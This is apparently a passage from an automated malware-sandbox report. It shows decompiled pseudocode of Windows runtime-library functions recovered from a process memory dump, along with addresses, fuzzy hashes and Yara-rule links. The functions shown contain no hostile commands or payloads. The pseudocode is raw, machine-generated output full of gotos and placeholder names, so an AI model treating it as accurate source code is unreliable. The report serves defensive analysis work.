								_t24 =  *0x49a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x49a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x49a5cd0;
				if( *0x49a5cd0 <= 0) {
					L048B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x49a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x49a87e8 = _t30;
						 *0x49a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0490D0D1(L04944320());
			}















                                                            0x04944257
                                                            0x04944257
                                                            0x04944257
                                                            0x04944259
                                                            0x0494425e
                                                            0x04944263
                                                            0x04944265
                                                            0x04944273
                                                            0x04944278
                                                            0x0494427c
                                                            0x0494427f
                                                            0x04944281
                                                            0x04944287
                                                            0x049442d7
                                                            0x049442d7
                                                            0x049442da
                                                            0x0494428d
                                                            0x0494428d
                                                            0x0494428f
                                                            0x04944292
                                                            0x04944297
                                                            0x0494429c
                                                            0x049442a0
                                                            0x049442a6
                                                            0x049442a8
                                                            0x049442ae
                                                            0x049442b3
                                                            0x00000000
                                                            0x049442ba
                                                            0x049442ba
                                                            0x049442bf
                                                            0x049442c5
                                                            0x049442ca
                                                            0x049442cf
                                                            0x049442d0
                                                            0x00000000
                                                            0x049442d0
                                                            0x049442b3
                                                            0x00000000
                                                            0x049442a6
                                                            0x0494429c
                                                            0x049442dc
                                                            0x049442dc
                                                            0x049442e3
                                                            0x04944309
                                                            0x049442e5
                                                            0x049442e5
                                                            0x049442e8
                                                            0x049442ee
                                                            0x049442f0
                                                            0x00000000
                                                            0x049442f2
                                                            0x049442f2
                                                            0x049442f4
                                                            0x049442f7
                                                            0x049442f9
                                                            0x04944300
                                                            0x04944300
                                                            0x049442f0
                                                            0x0494430e
                                                            0x0494431f

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ddd671c140e69b354dfd268afa0de184cd9608c70a1e60ddd7aa6c43ed89b8bc
                                                            • Instruction ID: f123f4f4b3b3e5293f01e612a68ffd9e71b707bbb726d12c033a8487550e4404
                                                            • Opcode Fuzzy Hash: ddd671c140e69b354dfd268afa0de184cd9608c70a1e60ddd7aa6c43ed89b8bc
                                                            • Instruction Fuzzy Hash: 2A2158B0A15701DFD714EF69D540B28BBF5FFC5318B20867AC1198BA94EB39E891CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 049346A7, Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E049346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E048FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E048ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L048D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                            0x049346b7
                                                            0x049346ba
                                                            0x049346c5
                                                            0x049346c8
                                                            0x049346d0
                                                            0x049346d4
                                                            0x049346e6
                                                            0x049346e9
                                                            0x049346f4
                                                            0x049346ff
                                                            0x04934705
                                                            0x04934706
                                                            0x0493470c
                                                            0x04934713
                                                            0x0493471b
                                                            0x04934723
                                                            0x04934725
                                                            0x049346d6
                                                            0x049346d9
                                                            0x049346db
                                                            0x049346db
                                                            0x04934732

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                            • Instruction ID: 0d08efc325fc28c008d8e52fa5d9e1437c450cd6595237d7a67ce02e31503fe0
                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                            • Instruction Fuzzy Hash: 42112572504208BBD7019F5CD8808BEB7B9EF86304F10816AF944CB350DA71AD55D7A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BC962, Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 42%
                                                            			E048BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x49ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E048CEEF0(0x49a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0493F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E048CEB70(_t29, 0x49a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E048FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0493F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x49a70c0; // 0x0
					while(_t38 != 0x49a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x49ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                            0x048bc96a
                                                            0x048bc974
                                                            0x048bc988
                                                            0x048bc98a
                                                            0x04927c9d
                                                            0x04927c9f
                                                            0x04927ca4
                                                            0x04927cae
                                                            0x04927cf0
                                                            0x04927cf5
                                                            0x04927cfa
                                                            0x048bc992
                                                            0x048bc996
                                                            0x048bc997
                                                            0x048bc998
                                                            0x048bc9a3
                                                            0x048bc9a3
                                                            0x04927cb0
                                                            0x04927cb7
                                                            0x04927cbb
                                                            0x00000000
                                                            0x00000000
                                                            0x04927cbd
                                                            0x04927ce8
                                                            0x04927cc5
                                                            0x04927cc8
                                                            0x04927cca
                                                            0x04927cd0
                                                            0x04927cd6
                                                            0x04927cde
                                                            0x04927ce4
                                                            0x04927ce4
                                                            0x04927cd0
                                                            0x00000000
                                                            0x04927ce8
                                                            0x048bc990
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d86a3cc3d93f06ce43c6ac4187688e5727176de698db038d6a527a9345edbe8a
                                                            • Instruction ID: 28c7f014b0156f2ffc5fe179655e85e36fe99c2cf1d50eaed53346475c786c6e
                                                            • Opcode Fuzzy Hash: d86a3cc3d93f06ce43c6ac4187688e5727176de698db038d6a527a9345edbe8a
                                                            • Instruction Fuzzy Hash: C411C2317046269FD710EEB8DD8692B77E5FF84618F000A79E94193654DB64FC20C7D2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F37F5, Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E048F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E048D2280(_t6, 0x49a8550);
				}
				_t29 = E048F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E048CFFB0(0x49a8550, _t27, 0x49a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                            0x048f37fa
                                                            0x048f37fc
                                                            0x048f3805
                                                            0x048f3808
                                                            0x048f3808
                                                            0x048f3814
                                                            0x048f3818
                                                            0x048f3846
                                                            0x048f3848
                                                            0x048f384b
                                                            0x048f384b
                                                            0x048f3852
                                                            0x00000000
                                                            0x048f3854
                                                            0x048f3856
                                                            0x00000000
                                                            0x00000000
                                                            0x048f3863
                                                            0x00000000
                                                            0x048f3863
                                                            0x048f381a
                                                            0x048f381a
                                                            0x048f381f
                                                            0x048f386e
                                                            0x048f386e
                                                            0x048f3871
                                                            0x048f3873
                                                            0x048f3873
                                                            0x048f3868
                                                            0x00000000
                                                            0x048f3868
                                                            0x048f3821
                                                            0x048f3826
                                                            0x00000000
                                                            0x00000000
                                                            0x048f3828
                                                            0x048f382a
                                                            0x048f3841
                                                            0x00000000
                                                            0x048f3841

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 615a200c044bca1637ad201f3060abd92b8a34fed14fcd7e25ef927d0620bf7c
                                                            • Instruction ID: 5fb1442d1b915ac301b58c500effad5c172eb5a17fb68acfa53e2bbcafbd0eea
                                                            • Opcode Fuzzy Hash: 615a200c044bca1637ad201f3060abd92b8a34fed14fcd7e25ef927d0620bf7c
                                                            • Instruction Fuzzy Hash: D90104B2A116109BD3278A1D9D00A26BBA6DF81B607554A69EE05CB300EB38EC00D7C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C766D, Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E048C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E048EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E048EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L048D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                            0x048c7672
                                                            0x048c767f
                                                            0x048c7689
                                                            0x048c76de
                                                            0x048c76de
                                                            0x048c768b
                                                            0x048c7691
                                                            0x048c7693
                                                            0x048c7697
                                                            0x00000000
                                                            0x048c7699
                                                            0x048c76a8
                                                            0x00000000
                                                            0x048c76aa
                                                            0x048c76ad
                                                            0x048c76b1
                                                            0x00000000
                                                            0x048c76b3
                                                            0x048c76b3
                                                            0x048c76b5
                                                            0x048c76ba
                                                            0x048c76bc
                                                            0x048c76bc
                                                            0x048c76c0
                                                            0x00000000
                                                            0x048c76c2
                                                            0x048c76ce
                                                            0x048c76ce
                                                            0x048c76c0
                                                            0x048c76b1
                                                            0x048c76a8
                                                            0x048c7697
                                                            0x048c76d9

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                            • Instruction ID: 8967d8dc80fd27379791cfa3dbb997c5e9bc5ced5c0cbcb089397d5e74caf9b7
                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                            • Instruction Fuzzy Hash: 3B01883270011AAFD720AE5ECC41E5B77ADEB95760F140B38BA09CB250DA70ED018BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B9080, Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E048B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x49a85ec;
				E048D2280(_t48, 0x49a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E048CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x49a538c; // 0x771c6888
					if( *_t84 != 0x49a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x498f6e8);
						E0490D0E8(0x49a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E049888F5(_t80, _t85, 0x49a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x49a86c0; // 0x3707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x49a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E048D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E049888F5(0x49a85ec, _t85, 0x49a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E048FAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x49ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x49a84c0;
																			if(_t82 >=  *0x49a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04989063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E048B922A(_t99);
										_t64 = E048D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04988B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x49a86c0; // 0x3707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x49a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x49a86bc;
													_t87 = 0x49a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E048B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x49a86c4;
												_t87 = 0x49a86c0;
												L27:
												E048E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0490D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x49a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x49a538c = _t51;
						goto L6;
					}
				}
			}




















                                                            0x048b9082
                                                            0x048b9083
                                                            0x048b9084
                                                            0x048b9085
                                                            0x048b9087
                                                            0x048b9096
                                                            0x048b9098
                                                            0x048b9098
                                                            0x048b909e
                                                            0x048b90a8
                                                            0x048b90e7
                                                            0x048b90e7
                                                            0x048b90aa
                                                            0x048b90b0
                                                            0x048b90b7
                                                            0x048b90bd
                                                            0x048b90dd
                                                            0x048b90e6
                                                            0x048b90bf
                                                            0x048b90bf
                                                            0x048b90c7
                                                            0x048b90cf
                                                            0x048b90f1
                                                            0x048b90f2
                                                            0x048b90f4
                                                            0x048b90f5
                                                            0x048b90f6
                                                            0x048b90f7
                                                            0x048b90f8
                                                            0x048b90f9
                                                            0x048b90fa
                                                            0x048b90fb
                                                            0x048b90fc
                                                            0x048b90fd
                                                            0x048b90fe
                                                            0x048b90ff
                                                            0x048b9100
                                                            0x048b9102
                                                            0x048b9107
                                                            0x048b910c
                                                            0x048b9110
                                                            0x048b9113
                                                            0x048b9115
                                                            0x048b9136
                                                            0x048b913f
                                                            0x048b9143
                                                            0x049137e4
                                                            0x049137e4
                                                            0x048b9117
                                                            0x048b9117
                                                            0x048b911d
                                                            0x00000000
                                                            0x048b911f
                                                            0x048b911f
                                                            0x048b9125
                                                            0x00000000
                                                            0x048b9127
                                                            0x048b912d
                                                            0x048b9130
                                                            0x048b9134
                                                            0x048b9158
                                                            0x048b915d
                                                            0x048b9161
                                                            0x048b9168
                                                            0x04913715
                                                            0x048b916e
                                                            0x048b916e
                                                            0x048b9175
                                                            0x048b9177
                                                            0x048b917e
                                                            0x048b917f
                                                            0x048b9182
                                                            0x048b9182
                                                            0x048b9187
                                                            0x048b9187
                                                            0x048b918a
                                                            0x048b918d
                                                            0x048b918f
                                                            0x048b9192
                                                            0x048b9195
                                                            0x048b9198
                                                            0x048b9198
                                                            0x048b9198
                                                            0x048b919a
                                                            0x00000000
                                                            0x00000000
                                                            0x0491371f
                                                            0x04913721
                                                            0x04913727
                                                            0x0491372f
                                                            0x04913733
                                                            0x04913735
                                                            0x04913738
                                                            0x0491373b
                                                            0x0491373d
                                                            0x04913740
                                                            0x00000000
                                                            0x04913746
                                                            0x04913746
                                                            0x04913749
                                                            0x00000000
                                                            0x0491374f
                                                            0x0491374f
                                                            0x04913751
                                                            0x04913757
                                                            0x04913759
                                                            0x0491375c
                                                            0x0491375c
                                                            0x0491375e
                                                            0x0491375e
                                                            0x04913761
                                                            0x04913764
                                                            0x00000000
                                                            0x00000000
                                                            0x04913766
                                                            0x04913768
                                                            0x049137a3
                                                            0x049137a3
                                                            0x049137a5
                                                            0x049137a7
                                                            0x049137ad
                                                            0x049137b0
                                                            0x049137b2
                                                            0x049137bc
                                                            0x049137c2
                                                            0x049137c2
                                                            0x049137b2
                                                            0x048b9187
                                                            0x048b9187
                                                            0x048b918a
                                                            0x048b918d
                                                            0x048b918f
                                                            0x048b9192
                                                            0x048b9195
                                                            0x00000000
                                                            0x048b9195
                                                            0x00000000
                                                            0x0491376a
                                                            0x0491376a
                                                            0x0491376a
                                                            0x0491376c
                                                            0x0491376c
                                                            0x0491376f
                                                            0x04913775
                                                            0x00000000
                                                            0x00000000
                                                            0x04913777
                                                            0x04913779
                                                            0x04913782
                                                            0x04913787
                                                            0x04913789
                                                            0x04913790
                                                            0x04913790
                                                            0x0491378b
                                                            0x0491378b
                                                            0x0491378b
                                                            0x04913792
                                                            0x04913795
                                                            0x00000000
                                                            0x04913795
                                                            0x00000000
                                                            0x04913779
                                                            0x04913798
                                                            0x00000000
                                                            0x04913798
                                                            0x00000000
                                                            0x04913768
                                                            0x0491379b
                                                            0x0491379b
                                                            0x04913751
                                                            0x04913749
                                                            0x00000000
                                                            0x04913740
                                                            0x048b91a0
                                                            0x048b91a3
                                                            0x048b91a9
                                                            0x048b91b0
                                                            0x00000000
                                                            0x048b91b0
                                                            0x048b9187
                                                            0x048b91b4
                                                            0x048b91b4
                                                            0x048b91bb
                                                            0x048b91c0
                                                            0x048b91c5
                                                            0x048b91c7
                                                            0x049137da
                                                            0x048b91cd
                                                            0x048b91cd
                                                            0x048b91cd
                                                            0x048b91d2
                                                            0x048b91d5
                                                            0x048b9239
                                                            0x048b9239
                                                            0x048b91d7
                                                            0x048b91db
                                                            0x048b91e1
                                                            0x048b91e7
                                                            0x048b91fd
                                                            0x048b9203
                                                            0x048b921e
                                                            0x048b9223
                                                            0x00000000
                                                            0x048b9205
                                                            0x048b9205
                                                            0x048b9208
                                                            0x048b920c
                                                            0x048b9214
                                                            0x048b9214
                                                            0x048b920c
                                                            0x048b91e9
                                                            0x048b91e9
                                                            0x048b91ee
                                                            0x048b91f3
                                                            0x048b91f3
                                                            0x048b91f3
                                                            0x048b91e7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048b9134
                                                            0x048b9125
                                                            0x048b911d
                                                            0x048b914e
                                                            0x048b90d1
                                                            0x048b90d1
                                                            0x048b90d3
                                                            0x048b90d6
                                                            0x048b90d8
                                                            0x00000000
                                                            0x048b90d8
                                                            0x048b90cf

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a7fc1091e332abec887b18388c5a007ed38af1c0c6489b7fe602c35f3cfc0de
                                                            • Instruction ID: ef48bdc06b9f674f7febbdfe1b2e42e91202753986904f645f8095f1b5ffbf0f
                                                            • Opcode Fuzzy Hash: 3a7fc1091e332abec887b18388c5a007ed38af1c0c6489b7fe602c35f3cfc0de
                                                            • Instruction Fuzzy Hash: AB01D6B2A01A04DFE314AF08D840711BBA9EF81324F224576E601DB791C674EC42CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0494C450, Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0494C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E048F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E048F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E048F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E048F95D0();
				return L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                            0x0494c458
                                                            0x0494c45d
                                                            0x0494c466
                                                            0x0494c468
                                                            0x0494c469
                                                            0x0494c46a
                                                            0x0494c46b
                                                            0x0494c46e
                                                            0x0494c46f
                                                            0x0494c471
                                                            0x0494c476
                                                            0x0494c476
                                                            0x0494c47c
                                                            0x0494c47e
                                                            0x0494c480
                                                            0x0494c480
                                                            0x0494c483
                                                            0x0494c484
                                                            0x0494c486
                                                            0x0494c488
                                                            0x0494c48f
                                                            0x0494c491
                                                            0x0494c493
                                                            0x0494c493
                                                            0x0494c48f
                                                            0x0494c498
                                                            0x0494c49e
                                                            0x0494c4ad
                                                            0x0494c4ad
                                                            0x0494c4b2
                                                            0x0494c4b4
                                                            0x0494c4cd

                                                            Memory Dump Source
